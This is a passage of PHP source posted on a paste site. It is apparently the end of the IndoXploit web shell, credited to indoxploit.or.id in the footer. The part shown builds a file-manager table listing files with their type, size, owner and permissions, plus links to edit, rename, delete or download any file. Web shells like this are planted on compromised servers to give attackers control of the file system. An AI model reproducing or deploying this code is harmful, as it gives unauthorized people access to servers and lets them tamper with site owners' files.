  1969. echo "<tr>";
  1970. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3n
  1971. wdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1972. echo "<td class='td_home'><center>$ftype</center></td>";
  1973. echo "<td class='td_home'><center>$size</center></td>";
  1974. echo "<td class='td_home'><center>$ftime</center></td>";
  1975. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1976. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1977. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1978. echo "</tr>";
  1979. }
  1980. echo "</table>";
  1981. if(!is_readable($dir)) {
  1982. //
  1983. } else {
  1984. echo "<hr>";
  1985. }
  1986. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
  1987. }
  1988. ?>
  1989.  
  1990. </html>
Add Comment
Please, Sign In to add comment